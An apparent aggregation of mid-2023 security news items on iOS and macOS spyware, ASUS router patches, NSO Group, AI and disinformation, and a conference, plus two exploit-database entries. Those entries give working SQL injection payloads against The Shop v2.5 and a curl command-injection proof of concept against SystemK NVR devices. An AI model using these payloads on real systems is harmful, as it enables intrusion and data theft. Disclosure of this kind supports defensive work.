More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation.
Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers.
The Russian

Mobile Security / Spyware

More details have emerged about the spyware implant that's delivered to iOS devices as part of a campaign called Operation Triangulation.

Kaspersky, which discovered the operation after becoming one of the targets at the start of the year, said the malware has a lifespan of 30 days, after which it gets automatically uninstalled unless the time period is extended by the attackers.

The Russian cybersecurity company has codenamed the backdoor **TriangleDB**.

"The implant is deployed after the attackers obtain root privileges on the target iOS device by exploiting a kernel vulnerability," Kaspersky researchers said in a new report published today.

"It is deployed in memory, meaning that all traces of the implant are lost when the device gets rebooted. Therefore, if the victim reboots their device, the attackers have to reinfect it by sending an iMessage with a malicious attachment, thus launching the whole exploitation chain again."

Operation Triangulation entails the use of zero-click exploits via the iMessage platform, thereby allowing the spyware to complete control over the device and user data.

"The attack is carried out using an invisible iMessage with a malicious attachment, which, using a number of vulnerabilities in the iOS operating system, is executed on a device and installs spyware," Eugene Kaspersky, CEO of Kaspersky, previously said.

"The deployment of the spyware is completely hidden and requires no action from the user."

TriangleDB, written in Objective-C, forms the crux of the covert framework. It's designed to establish encrypted connections with a command-and-control (C2) server and periodically send a heartbeat beacon containing the device metadata.

The server, for its part, responds to the heartbeat messages with one of 24 commands that make it possible to dump iCloud Keychain data and load additional Mach-O modules in memory to harvest sensitive data.

This includes file contents, geolocation, installed iOS applications, and running processes, among others. The attack chains culminate with the erasure of the initial message to cover up the tracks.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

A closer examination of the source code has revealed some unusual aspects where the malware authors refers to string decryption as "unmunging" and assign names from database terminology to files (record), processes (schema), C2 server (DB Server), and geolocation information (DB Status).

Another notable aspect is the presence of the routine "populateWithFieldsMacOSOnly." While this method is nowhere called in the iOS implant, the naming convention raises the possibility that TriangleDB could also be weaponized to target macOS devices.

"The implant requests multiple entitlements (permissions) from the operating system," Kaspersky researchers said.

"Some of them are not used in the code, such as access to camera, microphone and address book, or interaction with devices via Bluetooth. Thus, functionalities granted by these entitlements may be implemented in modules."

It's currently not known who is behind the campaign and what their ultimate objectives are. Apple, in a previous statement shared with The Hacker News, said it has "never worked with any government to insert a backdoor into any Apple product and never will."

The Russian government, however, has pointed fingers at the U.S., accusing it of breaking into "several thousand" Apple devices belonging to domestic subscribers and foreign diplomats as part of what it claimed to be a reconnaissance operation.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Report Exposes Operation Triangulation's Spyware Implant Targeting iOS Devices

The Shop version 2.5 suffers from a remote SQL injection vulnerability.

    # Exploit Title: The Shop v2.5 - SQL Injection# Date: 2023-06-17# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/the-shop/34858541# Demo Site: https://shop.activeitzone.com# Tested on: Kali Linux# CVE: N/A### Request ###POST /api/v1/carts/add HTTP/1.1Content-Type: application/jsonAccept: application/json, text/plain, */*x-requested-with: XMLHttpRequestx-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4Referer: https://localhostCookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7Content-Length: 81Accept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}### Parameter & Payloads ###Parameter: JSON qty ((custom) POST)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)END))","temp_user_id":null}    Type: time-based blind    Title: MySQL > 5.0.12 OR time-based blind (heavy query)    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNSC)","temp_user_id":null}

The Shop 2.5 SQL Injection

A vulnerability in Fibaro Motion Sensor firmware v3.4 allows attackers to cause a Denial of Service (DoS) via a crafted Z-Wave message.

Motion, light and temperature sensor

**See it in action**

**Small is beautiful**

Just under 2 inch diameter, featuring an immaculate, sleek, and modern white casing, you’ll fall in love with this motion sensor at first sight.

**Inspired by nature**

**Full mobility**

Battery-powered and completely wireless, the FIBARO Motion Sensor features a smart bracket with grip that allows it to be affixed almost anywhere – even on a wall or ceiling. The sensor’s location can be changed at any time for ultimate comfort and convenience.

**Technologically advanced**

FIBARO engineers created one of the world's most advanced technologies and placed in a miniature case.

**Compatible with other devices**

Its true potential shines when the FIBARO Motion Sensor is paired with other smart home devices. The sensor is capable of activating even the most complex sequences which are only limited by human imagination.

Motion       Lights: ON

**Multisensor**

Apart from sensing motion, the device also measures temperature and light levels, offering you a more complete motion detection solution. The accelerometer detects change in location or any attempt at opening its casing.

*   Motion sensor
*   Light sensor
*   Temperature sensor
*   Accelerometer

**Also available for Apple HomeKit**

We've created two lines of the FIBARO Motion Sensor - one for the FIBARO system or other compatible Z-Wave controllers, and one for Apple HomeKit. Whichever platform you choose, our products are designed to work seamlessly with either technology. Learn more.

**Hey Siri, has any motion been detected in the entrance?**

Available with 

**Colors indicate temperature change**

After detecting movement, the motion detector will use a different color to inform you about the current temperature in the room.

**Guarding your safety**

The FIBARO Motion Sensor is your home's ultimate guardian, watching over you and your family 24/7.

**Alarm panel**

The Fibaro Home Center panel displays more than just the current status. It also contains the history of events crucial to your safety.

**Immediate notifications**

The device will immediately inform you about any motion by sending a notification to your smart phone...

**for your convenience**

…or, by choosing appropriate settings, it won't bother you at all.

**Light intensity measurement**

A sensor hidden in the FIBARO Motion Sensor will allow you to dynamically adjust the lamps to the amount of natural light. The system will set the optimal lighting levels for everyone in the house, and illuminate the space around the building, all while conserving energy and saving money.

LIGHT SENSOR 128 LUX

**A home that wakes up with you**

The FIBARO Motion Sensor makes each morning unique. As soon as you wake up, the sensor will activate a scene that wakes up the entire house along with you.

**Always perfect lighting**

By measuring light intensity, the FIBARO Motion Sensor will adjust lighting to your needs. The sensor’s movement monitoring feature can wait until your little one is sound asleep before turning off the light. With FIBARO, you don’t need to worry abour your child when they sleep, or about wasting unnecessary energy.

LIGHT SENSOR 128 LUX

**Adjustable sensitivity levels**

The sensitivity setting of the FIBARO Motion Sensor can be changed to meet your needs. For example, adjust it to exclude the detection of small animals, like your cat or dog.

\*for devices working with Apple HomeKit this functionality requires support from mobile app

**Full control via the mobile app**

Our mobile app allows you to control and check status of the motion detector right from your phone. It is the most convenient and the easiest way to control your home from wherever you are.

Available on: 

**Watch the video**

**Choose your platform**

We've created two versions of the FIBARO Motion Sensor - one for the FIBARO system or other compatible Z-Wave controllers, and one for Apple HomeKit. Select the one compatable with your system. with either technology.

*   Bluetooth communication
*   2 years of battery life
*   Activating simple scenes
*   Voice control through Apple Siri®
*   Works with Apple devices with iOS 9 and newer.
*   Sharing home function

Buy

*   Wireless communication
*   2 years of battery life
*   Activating complex scenes
*   Smart notifications
*   Compatible with Android and iOS devices
*   A wide range of operation

Buy

CVE-2023-34597: FIBARO | Motion Sensor - Motion detector

Categories: Podcast
This week on Lock and Code, we speak with Lisa Kaplan about why every business with an online presence should ready themselves against a potential disinformation campaign. 



(Read more...)




The post Why businesses need a disinformation defense plan, with Lisa Kaplan: Lock and Code S04E13 appeared first on Malwarebytes Labs.

When you think about the word "cyberthreat," what first comes to mind? Is it ransomware? Is it spyware? Maybe it's any collection of the infamous viruses, worms, Trojans, and botnets that have crippled countless companies throughout modern history. 

In the future, though, what many businesses might first think of is something new: Disinformation. 

Back in 2021, in speaking about threats to businesses, the former director of the US Cybersecurity and Infrastructure Security Agency, Chris Krebs, told news outlet Axios: “You’ve either been the target of a disinformation attack or you are about to be.”

That same year, the consulting and professional services firm Price Waterhouse Coopers released a report on disinformation attacks against companies and organizations, and it found that these types of attacks were far more common than most of the public realized. From the report: 

“In one notable instance of disinformation, a forged US Department of Defense memo stated that a semiconductor giant’s planned acquisition of another tech company had prompted national security concerns, causing the stocks of both companies to fall. In other incidents, widely publicized unfounded attacks on a businessman caused him to lose a bidding war, a false news story reported that a bottled water company’s products had been contaminated, and a foreign state’s TV network falsely linked 5G to adverse health effects in America, giving the adversary’s companies more time to develop their own 5G network to compete with US businesses.”

Disinformation is here, and as much of it happens online—through coordinated social media posts and fast-made websites—it can truly be considered a "cyberthreat." 

But what does that mean for businesses? 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Lisa Kaplan, founder and CEO of Alethea, about how organizations can prepare for a disinformation attack, and what they should be thinking about in the intersection between disinformation, malware, and cybersecurity. Kaplan said:

> "When you think about disinformation in its purest form, what we're really talking about is people telling lies and hiding who they are in order to achieve objectives and doing so in a deliberate and malicious life. I think that this is more insidious than malware. I think it's more pervasive than traditional cyber attacks, but I don't think that you can separate disinformation from cybersecurity."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Why businesses need a disinformation defense plan, with Lisa Kaplan: Lock and Code S04E13

Categories: Exploits and vulnerabilities
Categories: News
Tags: ASUS

Tags:  router

Tags:  models

Tags:  CVE-2022-26376

Tags:  CVE-2018-1160

Tags:  Netatalk

Tags:  disable WAN

ASUS has released firmware updates for several router models fixing two critical and several other security issues.



(Read more...)




The post Update now! ASUS fixes nine security flaws appeared first on Malwarebytes Labs.

ASUS has released firmware updates for several router models fixing two critical and several other security issues.

The new firmware with accumulated security updates is available for the models GT6, GT-AXE16000, GT-AX11000 PRO, GT-AXE11000, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400.

You will find the latest firmware available for download from the ASUS support page or the appropriate product page. ASUS has also provided a link to new firmware for selected routers at the end of their security advisory.

When in doubt you can find the model number on the sticker which can usually be found on the back side of the router.

_Example: the model RT-AX86U which is on the list_

General instructions on how to update router firmware can be found here

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The new firmware incorporates the following security fixes:  CVE-2023-28702, CVE-2023-28703, CVE-2023-31195, CVE-2022-46871, CVE-2022-38105, CVE-2022-35401, CVE-2018-1160, CVE-2022-38393, and CVE-2022-26376.

The critical CVEs patched in these updates are:

CVE-2022-26376: A memory corruption vulnerability exists in the httpd unescape functionality of Asuswrt prior to 3.0.0.4.386\_48706 and Asuswrt-Merlin New Gen prior to 386.7.. A specially-crafted HTTP request can lead to memory corruption. An attacker can send a network request to trigger this vulnerability.

The Asuswrt-Merlin New Gen is an open source firmware alternative for Asus routers. The unescaped function in this firmware assumes that after a % there are always at least two characters. If this is not the case, one of the instructions in the function cause an out-of-bounds read. Out of bounds reads can lead to crashes or other unexpected vulnerabilities, and may allow an attacker to read sensitive information that they should not have access to.

CVE-2018-1160: Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi\_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.

Netatalk is a free, open-source implementation of the Apple Filing Protocol (AFP). It allows Unix-like operating systems to serve as file servers for Macintosh computers running macOS or Classic Mac OS.

This is a 5 year old vulnerability for which several exploits are publicly available.

Since many, especially home users will shy away of applying firmware, it is important to heed the advice offered by ASUS that says:

> “Please note, if you choose not to install this new firmware version, we strongly recommend disabling services accessible from the WAN side to avoid potential unwanted intrusions. These services include remote access from WAN, port forwarding, DDNS, VPN server, DMZ, port trigger.”

General instructions on how to disable the WAN access can be found here under point 7.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! ASUS fixes nine security flaws

SystemK NVR 504/508/516 version 2.3.5SK.30084998 suffer from a command injection vulnerability.

    # Exploit Title: SystemK NVR 504/508/516 Command Injection# Exploit Author: Keniver Wang# Publish Date: 19/06/2023# Date of found: 20/01/2021# Vendor: SystemK# Vendor Homepage: https://nvr.bz/# Version: NVR 504/508/516 2.3.5SK.30084998# Greets:    Weber Tsai (CHT Security)# Description    A Command Injection vulnerability in the DDNS Setting that allowsattacker to execute arbitrary commands with root privileges.# Proof of Conceptcurl 'http://<IP>/ddnsserver.cgi?action=test&address=members.dyndns.org&type=dyndns&username=&password=&hostname=;<COMMAND>;&updatetime=300'\  -X 'POST' \  -H 'Connection: keep-alive' \  -H 'Content-Length: 0' \  -H 'Authorization: Basic YWRtaW46YWRtaW4=' \  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)' \  -H 'Accept: */*' \  -H 'Accept-Language: zh-TW,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6'

SystemK NVR 504/508/516 Command Injection

Pressure mounts on the NSO Group's business viability as Khashoggi widow joins group of plaintiffs suing the Israeli firm for Pegasus spyware abuse.

NSO Group is facing a number of existential crises at the moment, and it appears there's a group of enterprising investors — including, reportedly, a Wrigley chewing gum magnate — ready to take advantage, lassoing control of arguably the most destructive and powerful spyware tool known to-date, i.e., Pegasus.

The Israeli firm was blacklisted by the US government in November 2021 for creating and selling its powerful zero-click spyware tool Pegasus, which has been used by its customers to target and track government officials, human rights workers, journalists, activists, academics, embassy workers, and businesspeople across the world. 

The designation placed severe restrictions on the firm's ability to operate by banning any transfer of US technology to NSO Group. Then, in December 2021 NSO Group's spyware was found on the phones of at least nine US State Department employees, which didn't help thaw the firm's relationship with Biden administration either.

There's also the problem of the mounting number of lawsuits.

**NSO Group's Lawsuit Docket Grows**

A new lawsuit filed by Hanan Elatr, widow of murdered Washington Post journalist Jamal Khashoggi, accuses NSO Group's Pegasus spyware of violating US hacking laws to track the couple leading up to the 2018 killing of the vocal Saudi dissident.

Elatr says in the lawsuit that the Pegasus spyware "caused her immense harm, both through the tragic loss of her husband and through her own loss of safety, privacy, and autonomy, as well as the loss of her financial stability and career."

In addition to Elatr, there are other, far more deep-pocketed legal foes for NSO Group to worry about. Apple filed suit in November 2021 against the organization for targeting its users with Pegasus spyware (attacks that are ongoing). And in January, the US Supreme Court denied a petition to block a suit to proceed against NSO Group filed by Meta-owned WhatsApp for spyware damages.

**Juicy Fruit Heir, Sandler Movie Producer Float NSO Purchase**

Despite the legal, business, and brand challenges, NSO Group reportedly continued to hone and improve Pegasus spyware. A recent report from research organization Citizen Lab, which has been at the forefront of working to expose Pegasus abuse, said it discovered at least three new exploit chains against human rights activists as recently as 2022.

Perhaps because of that, investors have begun to sniff out a potential opportunity. Reportedly, a motley gang of investors including Robert Simonds, a US investor whose background includes producing Adam Sandler movies, and his buddy, cannabis industry investor and chewing-gum fortune heir William "Beau" Wrigley, are looking at buying up NSO Group's assets, according to new reporting from The Guardian.

The report adds a spokesperson for Wrigley denied he is in discussions to buy NSO Group assets, while a source close to Simonds said he was "deep" in talks about a sale but aware it would be a steep climb to get the deal done. 

"Placing such powerful surveillance technology in the hands of individuals who may not have deep expertise in the cyber industry or a history of involvement in the sector raises questions about the potential ramifications," Callie Guenther, cyber threat research manager with Critical Start tells Dark Reading about the potential NSO sell-off. "It is essential to ensure that any potential acquirer of NSO's assets possesses the necessary expertise to handle the technology responsibly, maintain appropriate safeguards, and prevent potential misuse."

It should be noted that other attempts at buying control of Pegasus haven't worked out. Last year L3Harris, an American company and US defense contractor was looking into a possible purchase of NSO Group's technology, but the White House objected over "serious counter-intelligence and security concerns," the Guardian added.

Then there is the Israeli government, which closely regulates NSO Group and could potentially intervene in any sell off of its technology, the Guardian points out.

"NSO operates under close regulation by Israel's Ministry of Defense, and any potential sale of its assets would likely face scrutiny from Israeli authorities," Guenther says. "It remains to be seen how such a transaction could proceed and whether it would comply with relevant regulatory requirements and national security considerations."

Perhaps there's a pot-sweetener here though: The Guardian added a juicy rumor to its reporting that Simonds has privately pledged to hand over the surveillance technology to the so called "Five Eyes" alliance between the intelligence agencies of Australia, Canada, New Zealand, the UK, and the US.

Even so, a pledge is not a guarantee. Guenther outlines a number of potential problems with NSO Group's assets falling into the wrong hands, including giving the new owners the power to improve upon its existing capabilities for exploitation, targeting, as well as slow down future potential vulnerability disclosures.

"The acquisition could impact the overall cyber threat landscape. If NSO's spyware technology becomes more accessible or proliferates in unauthorized hands, it could lead to an increase in targeted attacks, surveillance activities, and potential abuse," Guenther warns. "This would necessitate heightened vigilance and strengthened defensive measures from organizations, governments, and cybersecurity communities to mitigate the associated risks."

**Has Pegasus Already Peaked?**

Many may question the power a tool like Pegasus could have when flying on behalf of someone rich enough to buy it, but the true value of NSO Group, and its dominance in the spyware space, might have already peaked.

JT Keating, senior vice president of mobile security firm Zimperium, explained to Dark Reading that the trend is decidedly moving toward open source spyware, making the surveillance tools available to almost anyone and driving down the value of NSOs proprietary Pegasus product.

"Spyware is now mainstream, including the shift from sole reliance on the Dark Web for distribution to seeing the same kits and tools being found on online repositories like GitHub or online communities like Reddit," Keating says. "Regardless of what happens to organizations like NSO, mobile spyware will only continue to proliferate."

Meanwhile though, the squeeze on NSO Group's business continues.

US Investors Sniffing Around Blacklisted NSO Group Assets

Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems.
"As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday.
The Romanian firm's

Endpoint Security / Hacking

Cybersecurity researchers have uncovered a set of malicious artifacts that they say is part of a sophisticated toolkit targeting Apple macOS systems.

"As of now, these samples are still largely undetected and very little information is available about any of them," Bitdefender researchers Andrei Lapusneanu and Bogdan Botezatu said in a preliminary report published on Friday.

The Romanian firm's analysis is based on an examination of four samples that were uploaded to VirusTotal by an unnamed victim. The earliest sample dates back to April 18, 2023.

Two of the three malicious programs are said to be generic Python-based backdoors that are designed to target Windows, Linux, and macOS systems. The payloads have been collectively dubbed **JokerSpy**.

The first constituent is shared.dat, which, once launched, runs an operating system check (0 for Windows, 1 for macOS, and 2 for Linux) and establishes contact with a remote server to fetch additional instructions for execution.

This includes gathering system information, running commands, downloading and executing files on the victim machine, and terminating itself.

On devices running macOS, Base64-encoded content retrieved from the server is written to a file named "/Users/Shared/AppleAccount.tgz" that's subsequently unpacked and launched as the "/Users/Shared/TempUser/AppleAccountAssistant.app" application.

The same routine, on Linux hosts, validates the operating system distribution by checking the "/etc/os-release" file. It then proceeds to write C code to a temporary file "tmp.c," which is compiled to a file called "/tmp/.ICE-unix/git" using the cc command on Fedora and gcc on Debian.

Bitdefender said it also found a "more potent backdoor" among the samples, a file labeled "sh.py" that comes with an extensive set of capabilities to gather system metadata, enumerate files, delete files, execute commands and files, and exfiltrate encoded data in batches.

The third component is a FAT binary known as xcc that's written in Swift and targets macOS Monterey (version 12) and newer. The file houses two Mach-O files for the twin CPU architectures, x86 Intel and ARM M1.

"Its primary purpose is apparently to check permissions before using a potential spyware component (probably to capture the screen) but does not include the spyware component itself," the researchers said.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

"This leads us to believe that these files are part of a more complex attack and that several files are missing from the system we investigated."

xcc's spyware connections stem from a path identified within the file content, "/Users/joker/Downloads/Spy/XProtectCheck/" and the fact that it checks for permissions such as Disk Access, Screen Recording, and Accessibility.

The identity of the threat actors behind the activity is unknown as yet. It's currently also not clear how initial access is obtained, and if it involves an element of social engineering or spear-phishing.

The disclosure comes a little over two weeks after Russian cybersecurity company Kaspersky disclosed that iOS devices have been targeted as part of a sophisticated and long-running mobile campaign dubbed Operation Triangulation that began in 2019.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Discover New Sophisticated Toolkit Targeting Apple macOS Systems

The AI era promises a flood of disinformation, deepfakes, and hallucinated “facts.” Psychologists are only beginning to grapple with the implications.

Artificial intelligence is arguably the most rapidly advancing technology humans have ever developed. A year ago you wouldn’t often hear AI come up in a regular conversation, but today it seems there’s constant talk about how generative AI tools like ChatGPT and DALL-E will affect the future of work, the spread of information, and more. A major question that has thus far been almost entirely unexamined is how this AI-dominated future will affect people’s minds.

There’s been some research into how using AI in their jobs will affect people mentally, but there isn’t yet an understanding of how simply living amongst so much AI-generated content and systems will affect people’s sense of the world. How is AI going to change individuals and society in the not-too-distant future?

AI will obviously make it easier to produce disinformation—from fake images to deepfakes to fake news. That will affect people’s sense of trust as they’re scrolling on social media. AI can also allow someone to imitate your loved ones, which further erodes people’s general ability to trust what was once unquestionable. That may also affect how they think about identity.

Your own identity can be threatened by deepfakes, too, if people are creating images or videos of you doing things you never actually did. In the US, people often identify with their jobs, and those could soon be threatened. Will AI make people more reliant on and distracted by technology at a time when that’s already a major issue? There are countless ways AI could reshape how people operate in the world. But researchers are only just beginning to grapple with the implications of an AI-saturated existence.

Larry Rosen, a professor emeritus of psychology at California State University, Dominguez Hills, says he worries that AI will make people more reliant on technology. Humans like things to be as simple and easy as possible, to avoid stress, he says, so people might start automating every aspect of their life that they can.

In the same way you might use Google Maps to get everywhere and not know how to get there otherwise, AI might cause people to stop learning things they would have otherwise had to learn. Ironically, though, Rosen thinks this could cause _more_ stress as people are inundated with AI and constantly shifting gears and not seeing anything quite clearly.

“I get concerned about the fact that we just blindly believe the GPS. We don’t question it. Are we just going to blindly believe the AI?” Rosen says. “As it is, we’re overwhelmed. We’re so overwhelmed that we can’t make ourselves do a simple task and see it to completion. Anxiety is just going to ratchet up as we’re faced with this unknown thing in our world.”

Michael Graziano, a professor of psychology and neuroscience at Princeton University, says he thinks AI could create a “post-truth world.” He says it will likely make it significantly easier to convince people of false narratives, which will be disruptive in many ways.

“Reality has become pixels, and pixels are now infinitely inventable,” Graziano says. “We can create them any way we want to.”

That being said, Graziano also wonders if AI could help us with the loneliness epidemic, which is a big strain on mental health. Perhaps people will think of AI as a friend? But what happens then? We don’t yet know, Graziano says.

“We don’t actually know what kind of impact this technology will have,” Graziano says.

Michal Kosinski, a computational psychologist and associate professor of organizational behavior at Stanford University, says AI could have an interesting impact on how people think about their work. He says AI will be better at doing many tasks that humans do today, so people will rely on it, and they could essentially become the human face of the work the AI is doing.

“Increasingly, not only medical doctors but politicians and judges and teachers will become interfaces for algorithms,” Kosinki says. “When you go to a doctor, a doctor will still give you a diagnosis, but this diagnosis will just be printed out of a computer that analyzed your vital signs and symptoms and told the doctor to give you this medicine.”

AI is going to have an impact on almost every aspect of human life, and Graziano says much more research is needed into how this will affect people’s minds. If social media can have such a major impact on society, there’s no telling what consequences a rapidly advancing technology like AI could precipitate.

“I would like to see people collect actual data on people’s psychological state, personalities, their mental health as a function of their engagement with AI,” Graziano says. “What does that do? Does it actually improve things in some ways and harm things in other ways? Is it dependent on the particular personality or particular socio-economic status of a person? There’s this giant area that isn’t studied.”

Kosinki says people are just starting to see how quickly these AI systems are advancing, and they’re just going to keep becoming more complex and capable of more things. The world might look a lot different in just a year, and there’s no saying what it will look like further down the road.

“We are sliding, very quickly, towards an AI-controlled and AI-dominated world,” Kosinki says.

Humans Aren’t Mentally Ready for an AI-Saturated ‘Post-Truth World’

This first-ever event, hosted by the Security Industry Association and ASIS International and designed to advance, connect, and empower women in security, gathered hundreds of industry leaders in Nashville June 12-13, 2023.

**ALEXANDRIA, Va. & SILVER SPRING, Md. –** ASIS International and the Security Industry Association (SIA) closed out the inaugural Security LeadHER conference this week, celebrating a successful and groundbreaking first event held June 12-13 in Nashville, Tennessee. The event was dedicated to advancing, connecting and empowering women in the security profession.

Approximately 300 current and future "LeadHERs" and attendees of all backgrounds and genders gathered for Security LeadHER 2023. This year's Security LeadHER program kicked off on June 12 with a variety of fun and engaging activities, including a behind-the-scenes security tour of Nashville's famed Ryman Auditorium, a tour of the National Museum of African American Music and a women's self-defense class, and wrapped up with a lively networking reception at Johnny Cash’s Bar & BBQ.

On June 13, the Security LeadHER conference programming began with a motivating keynote from author, renowned speaker and sought-after consultant Eliza VanCort on how to "Claim Your Success – Stand Tall, Raise Your Voice and Be Heard." In this dynamic presentation, VanCort shared her personal journey from childhood kidnappings to a near-fatal head injury to becoming a No. 1 bestselling author, addressed some of today's most important women’s leadership issues and offer participants valuable communication and presentation guidance and concrete skills to achieve their goals professionally and in every aspect of their lives.

Additional programming focused on two tracks – Leadership and Security & Innovation – featuring presentations from industry-leading subject matter experts. Track sessions gave actionable guidance on topics such as confidently saying no and setting boundaries, addressing virtual threats and harassment, mitigating our unconscious biases against women in security, anonymizing your digital footprint, protecting data in the cloud, leading by influence and the science of sex and its impact on the industry.

The conference closed with a moving keynote from diversity, equity and inclusion practitioner, spoken word artist, emcee and poetry specialist Charity Blackwell. Attendees enjoyed the immersive spoken word performance and keynote address exploring the meaning of owning your legacy through your work.

"The inaugural Security LeadHER event is a wrap, and what a success it was! My mind is full of new ideas, my LinkedIn account is full of new connections and my heart is full of gratitude for all the hard work done by the SIA and ASIS communities to make this event something to remember," said Elaine Palome, director of human resources, Americas, at Axis Communications and event co-chair for Security LeadHER. "It was so inspiring to see more than 300 women and their allies gathered together to share stories, ideas and knowledge. We are already thinking about next year’s event and hope you will join us."

"Our inaugural Security LeadHER event was a smashing success. The energy in the room was palpable," said Antoinette King, founder of Credo Cyber Consulting LLC and event co-chair for Security LeadHER. "Our opening keynote was delivered by Eliza VanCort. Eliza's insights on communication were incredibly helpful, and I walked away with many new communication tools. The education sessions were super insightful. Our closing keynote, Charity Blackwell, was simply masterful. I left the conference with so much excitement for the future of our industry!"

Security LeadHER 2023 was made possible in part thanks to the generous support of Featured Sponsor Apple; Premier Sponsors dormakaba, Intel and Wesco; Executive Sponsors Axis Communications and Securitas; and Partner Sponsors Allegion, Altronix, Boon Edam, Brivo, GSA Schedules, Inc., IDEMIA, Prosegur and SAGE Integration.

**About ASIS International**

Founded in 1955, ASIS International is the world’s largest membership organization for security management professionals. With 34,000 members hundreds of chapters across the globe, ASIS is recognized as the premier source for learning, networking, standards, and research. Through its board certifications, award-winning Security Management magazine, and Global Security Exchange (GSX) – the most influential event in the profession – ASIS ensures its members and the security community have access to the intelligence and resources necessary to protect their people, property, and information assets.

**About the Security Industry Association**

SIA is the leading trade association for global security solution providers, with over 1,400 innovative member companies representing thousands of security leaders and experts who shape the future of the security industry. SIA protects and advances its members' interests by advocating pro-industry policies and legislation at the federal and state levels, creating open industry standards that enable integration, advancing industry professionalism through education and training, opening global market opportunities, and collaborating with other like-minded organizations. As the premier sponsor of ISC Events expos and conferences, SIA ensures its members have access to top-level buyers and influencers, as well as unparalleled learning and network opportunities. SIA also enhances the position of its members in the security marketplace through SIA GovSummit, which brings together private industry with government decision makers, and Securing New Ground, the security industry's top executive conference for peer-to-peer networking.

Tag

#apple